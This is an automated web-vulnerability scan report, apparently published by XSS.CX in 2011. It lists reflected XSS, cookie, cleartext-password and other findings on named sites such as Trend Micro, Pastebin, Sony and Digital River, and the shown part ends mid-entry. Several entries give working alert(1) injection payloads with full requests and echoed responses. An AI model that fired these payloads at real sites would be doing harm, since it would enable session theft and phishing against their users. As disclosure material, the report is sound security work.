XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09072011-03

Report generated by XSS.CX at Wed Sep 07 14:16:34 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search


1. Cross-site scripting (reflected)

1.1. http://blog.trendmicro.com/ [s parameter]

1.2. http://display.digitalriver.com/ [aid parameter]

1.3. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter]

1.4. http://display.digitalriver.com/ [tax parameter]

1.5. http://pastebin.com/bq8xJPMn [REST URL parameter 1]

1.6. http://pastebin.com/bq8xJPMn [name of an arbitrarily supplied request parameter]

1.7. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 1]

1.8. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 2]

1.9. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 3]

1.10. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 4]

1.11. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 1]

1.12. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 2]

1.13. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 3]

1.14. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 4]

1.15. http://pastebin.com/etc/social/index.html [REST URL parameter 1]

1.16. http://pastebin.com/etc/social/index.html [REST URL parameter 2]

1.17. http://pastebin.com/etc/social/index.html [REST URL parameter 3]

1.18. http://pastebin.com/favicon.ico [REST URL parameter 1]

1.19. http://pastebin.com/i/fixed.css [REST URL parameter 1]

1.20. http://pastebin.com/i/fixed.css [REST URL parameter 2]

1.21. http://pastebin.com/i/style.css [REST URL parameter 1]

1.22. http://pastebin.com/i/style.css [REST URL parameter 2]

1.23. http://pastebin.com/js/ZeroClipboard.swf [REST URL parameter 1]

1.24. http://pastebin.com/js/ZeroClipboard.swf [REST URL parameter 2]

1.25. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [Ntk parameter]

1.26. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [Ntt parameter]

1.27. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [Ntt parameter]

1.28. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [name of an arbitrarily supplied request parameter]

1.29. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [x parameter]

1.30. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [y parameter]

1.31. https://store.trendmicro.com/DRHM/store [name of an arbitrarily supplied request parameter]

1.32. https://store.trendmicro.com/DRHM/store [paymentMethodID%24%2452524 parameter]

1.33. https://store.trendmicro.com/DRHM/store [paymentMethodID%24%2452525 parameter]

1.34. http://wd.sharethis.com/api/getCount2.php [cb parameter]

1.35. http://webconnect.sendouts.com/candidate/my-profile.aspx [Group parameter]

1.36. http://webconnect.sendouts.com/forgot-login.aspx [Group parameter]

1.37. http://webconnect.sendouts.com/job-search.aspx [Group parameter]

1.38. http://webconnect.sendouts.com/login.aspx [Group parameter]

1.39. https://www.ca.com/us/register/login.aspx [returnURL parameter]

1.40. http://www.javalobby.org/articles/acegisecurity/part1.jsp [name of an arbitrarily supplied request parameter]

1.41. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [cmd parameter]

1.42. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [dialogID parameter]

1.43. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [docType parameter]

1.44. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [docTypeID parameter]

1.45. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [name of an arbitrarily supplied request parameter]

1.46. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [sliceId parameter]

1.47. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [sliceId parameter]

1.48. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [stateId parameter]

1.49. http://www.typepad.com/services/toolbar [autofollowed parameter]

2. Flash cross-domain policy

2.1. http://www.viddler.com/crossdomain.xml

2.2. http://blog.trendmicro.com/crossdomain.xml

2.3. http://wd.sharethis.com/crossdomain.xml

2.4. http://www.typepad.com/crossdomain.xml

3. Cleartext submission of password

3.1. http://webconnect.sendouts.com/login.aspx

3.2. http://www.javalobby.org/articles/acegisecurity/part1.jsp

3.3. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html

4. Session token in URL

4.1. http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay

4.2. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog

4.3. http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

4.4. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html

5. Password field submitted using GET method

6. ASP.NET ViewState without MAC enabled

6.1. http://webconnect.sendouts.com/forgot-login.aspx

6.2. http://webconnect.sendouts.com/job-search.aspx

6.3. http://webconnect.sendouts.com/login.aspx

7. Cookie without HttpOnly flag set

7.1. http://www.kb.sony.com/

7.2. http://www.kb.sony.com/selfservice/closeviewdocument.do

7.3. http://www.kb.sony.com/selfservice/common/extIFrame.jsp

7.4. http://www.kb.sony.com/selfservice/common/viewdocument_appFooter.jsp

7.5. http://www.kb.sony.com/selfservice/common/viewdocument_appHeader.jsp

7.6. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Metadata.jsp

7.7. http://www.kb.sony.com/selfservice/getUMBrowseImageById.do

7.8. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/

7.9. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSS690CX.jpg

7.10. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSV680CX.jpg

7.11. http://store.sony.com/webapp/wcs/stores/servlet/SYErrorRedirect

7.12. http://store.sony.com/webapp/wcs/stores/servlet/SYSearchAjax

7.13. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog

7.14. https://store.trendmicro.com/DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js

7.15. https://www.ca.com/siteminderagent/forms/login.fcc

7.16. https://www.ca.com/us/register/login.aspx

8. Password field with autocomplete enabled

8.1. http://webconnect.sendouts.com/login.aspx

8.2. https://www.ca.com/us/register/createprofile.aspx

8.3. https://www.ca.com/us/register/login.aspx

8.4. https://www.ca.com/us/register/login.aspx

8.5. https://www.ca.com/us/register/login.aspx

8.6. https://www.ca.com/us/register/login.aspx

8.7. https://www.ca.com/us/register/login.aspx

8.8. http://www.javalobby.org/articles/acegisecurity/part1.jsp

8.9. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html

9. Referer-dependent response

9.1. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html

9.2. http://www.viddler.com/embed/dca1712/

9.3. http://www.viddler.com/player/dca1712/0

10. SSL cookie without secure flag set

10.1. https://store.trendmicro.com/DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js

10.2. https://www.ca.com/siteminderagent/forms/login.fcc

10.3. https://www.ca.com/us/register/login.aspx

11. Cookie scoped to parent domain

11.1. https://www.ca.com/siteminderagent/forms/login.fcc

11.2. https://www.ca.com/us/register/login.aspx

12. Cross-domain Referer leakage

12.1. http://blog.trendmicro.com/

12.2. http://blog.trendmicro.com/wp-content/plugins/flash-gallery/js/addOnLoad.js

12.3. http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay

12.4. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog

12.5. http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

12.6. https://store.trendmicro.com/DRHM/store

12.7. https://store.trendmicro.com/store

12.8. https://www.ca.com/us/register/createprofile.aspx

12.9. https://www.ca.com/us/register/login.aspx

12.10. http://www.kb.sony.com/selfservice/common/viewdocument_appFooter.jsp

12.11. http://www.kb.sony.com/selfservice/microsites/search.do

12.12. http://www.kb.sony.com/selfservice/microsites/searchEntry.do

13. Cross-domain script include

13.1. http://blog.trendmicro.com/

13.2. http://blog.trendmicro.com/a-snapshot-of-android-threats-infographic/

13.3. http://blog.trendmicro.com/blackhat-2011-dangers-of-embedded-web-servers/

13.4. http://blog.trendmicro.com/category/exploits/

13.5. http://blog.trendmicro.com/category/pharming/

13.6. http://blog.trendmicro.com/trend-micro-researchers-identify-vulnerability-in-hotmail/

13.7. http://blog.trendmicro.com/wp-content/plugins/flash-gallery/js/addOnLoad.js

13.8. http://pastebin.com/bq8xJPMn

13.9. http://pastebin.com/etc/ads/iframes/160x600.html

13.10. http://pastebin.com/etc/ads/iframes/728x90.html

13.11. http://pastebin.com/etc/social/index.html

13.12. http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay

13.13. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog

13.14. http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

13.15. https://store.trendmicro.com/DRHM/store

13.16. https://store.trendmicro.com/store

13.17. https://www.ca.com/us/register/createprofile.aspx

13.18. https://www.ca.com/us/register/forgotpassword.aspx

13.19. https://www.ca.com/us/register/login.aspx

13.20. http://www.javalobby.org/articles/acegisecurity/part1.jsp

13.21. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html

14. TRACE method is enabled

15. Email addresses disclosed

15.1. http://blog.trendmicro.com/wp-content/plugins/what-would-seth-godin-do/jquery.cookie.js

15.2. http://pastebin.com/bq8xJPMn

15.3. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js

15.4. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js

15.5. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js

15.6. https://www.ca.com/us/register/createprofile.aspx

15.7. https://www.ca.com/us/register/forgotpassword.aspx

15.8. https://www.ca.com/us/register/login.aspx

15.9. http://www.kb.sony.com/selfservice/jslib/CalendarPopup.js

16. Private IP addresses disclosed

16.1. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js

16.2. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_bluray_eventListeners.js

16.3. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_custom_tabbing.js

16.4. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_global.js

16.5. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_jsf_debug/ss_global.js

17. Robots.txt file

17.1. http://blog.trendmicro.com/

17.2. http://display.digitalriver.com/

17.3. http://pastebin.com/i/fixed.css

17.4. https://store.trendmicro.com/store

17.5. http://www.javalobby.org/articles/acegisecurity/part1.jsp

17.6. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html

17.7. http://www.viddler.com/embed/dca1712/

18. Cacheable HTTPS response

19. HTML does not specify charset

19.1. http://display.digitalriver.com/

19.2. http://store.sony.com/webapp/wcs/stores/servlet/SYSearchAjax

19.3. http://wd.sharethis.com/api/getCount2.php

19.4. http://www.kb.sony.com/selfservice/common/bg_323232.html

20. Content type incorrectly stated

20.1. http://display.digitalriver.com/

20.2. http://store.sony.com/webapp/wcs/stores/servlet/SYSearchAjax

20.3. https://store.trendmicro.com/favicon.ico

20.4. http://wd.sharethis.com/api/getCount2.php

20.5. https://www.ca.com/images/icons/checkmark.gif

20.6. http://www.javaworld.com/favicon.ico

21. Content type is not specified

21.1. http://www.javalobby.org/favicon.ico

21.2. http://www.kb.sony.com/Platform/Publishing/images/DT/icons/6/DT_MICROSOFTKB_1_1

21.3. http://www.kb.sony.com/Platform/Publishing/images/DT/icons/600/DT_KNOWLEDGEARTICLES_1_1

21.4. http://www.kb.sony.com/Platform/Publishing/images/DT/icons/703/DT_MANUAL_1_1

22. SSL certificate

22.1. https://store.trendmicro.com/

22.2. https://www.ca.com/



1. Cross-site scripting (reflected)
There are 49 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://blog.trendmicro.com/ [s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.trendmicro.com
Path:   /

Issue detail

The value of the s request parameter is copied into the HTML document as plain text between tags. The payload 60122<script>alert(1)</script>7e9986f3a17 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?s=xss60122<script>alert(1)</script>7e9986f3a17&Submit=+Go+ HTTP/1.1
Host: blog.trendmicro.com
Proxy-Connection: keep-alive
Referer: http://blog.trendmicro.com/category/exploits/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; CMAVID=50021315153052143970353; __utma=247958868.312697069.1315350994.1315350994.1315350994.1; __utmb=247958868.3.10.1315350994; __utmc=247958868; __utmz=247958868.1315350994.1.1.utmcsr=us.trendmicro.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/search/; wwsgd_visits=3; bn_u=6923713914570485926; cmRS=&t1=1315351005853&t2=1315351007808&t3=-1&t4=1315351004379&fti=1315351012197&fn=UNDEFINED%3A0%3B&ac=0:S&fd=0%3A1%3ASubmit%3B0%3A0%3As%3B&uer=&fu=/&pi=&ho=analytics.trendmicro.com/cm%3F&ci=90302752%3B90369712&ul=http%3A//blog.trendmicro.com/category/exploits/&rf=http%3A//blog.trendmicro.com/a-snapshot-of-android-threats-infographic/

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
X-Pingback: http://blog.trendmicro.com/xmlrpc.php
test : test
X-Mobilized-By: WordPress Mobile Pack 1.2.4
X-Varnish: 1696292975
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 06 Sep 2011 18:17:33 GMT
Date: Tue, 06 Sep 2011 18:17:33 GMT
Content-Length: 39428
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http:
...[SNIP]...
</a> &gt; Search Results for xss60122<script>alert(1)</script>7e9986f3a17<br />
...[SNIP]...

1.2. http://display.digitalriver.com/ [aid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6c82'-alert(1)-'417cdac0750 was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=244a6c82'-alert(1)-'417cdac0750&tax=trend_micro HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://us.trendmicro.com/us/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 18:13:06 GMT
Server: Apache/2.2.9
Expires: Tue, 06 Sep 2011 18:43:06 GMT
Last-Modified: Tue, 06 Sep 2011 18:13:06 GMT
Content-Length: 234
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244a6c82'-alert(1)-'417cdac0750&tax=trend_micro';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

1.3. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a55b'-alert(1)-'0024805587a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=244&tax=trend_micro&8a55b'-alert(1)-'0024805587a=1 HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://us.trendmicro.com/us/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 18:13:08 GMT
Server: Apache/2.2.9
Expires: Tue, 06 Sep 2011 18:43:08 GMT
Last-Modified: Tue, 06 Sep 2011 18:13:08 GMT
Content-Length: 237
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=trend_micro&8a55b'-alert(1)-'0024805587a=1';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

1.4. http://display.digitalriver.com/ [tax parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The value of the tax request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76aea'-alert(1)-'2f2fe981849 was submitted in the tax parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=244&tax=trend_micro76aea'-alert(1)-'2f2fe981849 HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://us.trendmicro.com/us/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 18:13:07 GMT
Server: Apache/2.2.9
Expires: Tue, 06 Sep 2011 18:43:07 GMT
Last-Modified: Tue, 06 Sep 2011 18:13:07 GMT
Content-Length: 234
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=trend_micro76aea'-alert(1)-'2f2fe981849';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

1.5. http://pastebin.com/bq8xJPMn [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /bq8xJPMn

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75bda"><script>alert(1)</script>e6654f051f5 was submitted in the REST URL parameter 1. This input was echoed as 75bda\"><script>alert(1)</script>e6654f051f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bq8xJPMn75bda"><script>alert(1)</script>e6654f051f5 HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php#pq=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php&hl=en&cp=1&gs_id=3&xhr=t&q=http://www.rankmyhack.com/includes/indexheader.php&pf=p&sclient=psy&source=hp&pbx=1&oq=http://www.rankmyhack.com/includes/indexheader.php&aq=f&aqi=&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=909
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:40 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=24; expires=Tue, 04-Oct-2011 18:10:40 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10554

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/bq8xJPMn75bda\"><script>alert(1)</script>e6654f051f5"/>
...[SNIP]...

1.6. http://pastebin.com/bq8xJPMn [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /bq8xJPMn

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba897"><script>alert(1)</script>b386f4c98c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ba897\"><script>alert(1)</script>b386f4c98c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bq8xJPMn?ba897"><script>alert(1)</script>b386f4c98c8=1 HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php#pq=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php&hl=en&cp=1&gs_id=3&xhr=t&q=http://www.rankmyhack.com/includes/indexheader.php&pf=p&sclient=psy&source=hp&pbx=1&oq=http://www.rankmyhack.com/includes/indexheader.php&aq=f&aqi=&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=909
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:40 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=22; expires=Tue, 04-Oct-2011 18:10:40 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/bq8xJPMn?ba897\"><script>alert(1)</script>b386f4c98c8=1"/>
...[SNIP]...

1.7. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /etc/ads/iframes/160x600.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd4be"><script>alert(1)</script>1b7c01d5428 was submitted in the REST URL parameter 1. This input was echoed as fd4be\"><script>alert(1)</script>1b7c01d5428 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /etcfd4be"><script>alert(1)</script>1b7c01d5428/ads/iframes/160x600.html HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=17; expires=Tue, 04-Oct-2011 18:10:38 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/etcfd4be\"><script>alert(1)</script>1b7c01d5428/ads/iframes/160x600.html"/>
...[SNIP]...

1.8. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /etc/ads/iframes/160x600.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca1b0"><script>alert(1)</script>e6b4ca5c2bf was submitted in the REST URL parameter 2. This input was echoed as ca1b0\"><script>alert(1)</script>e6b4ca5c2bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

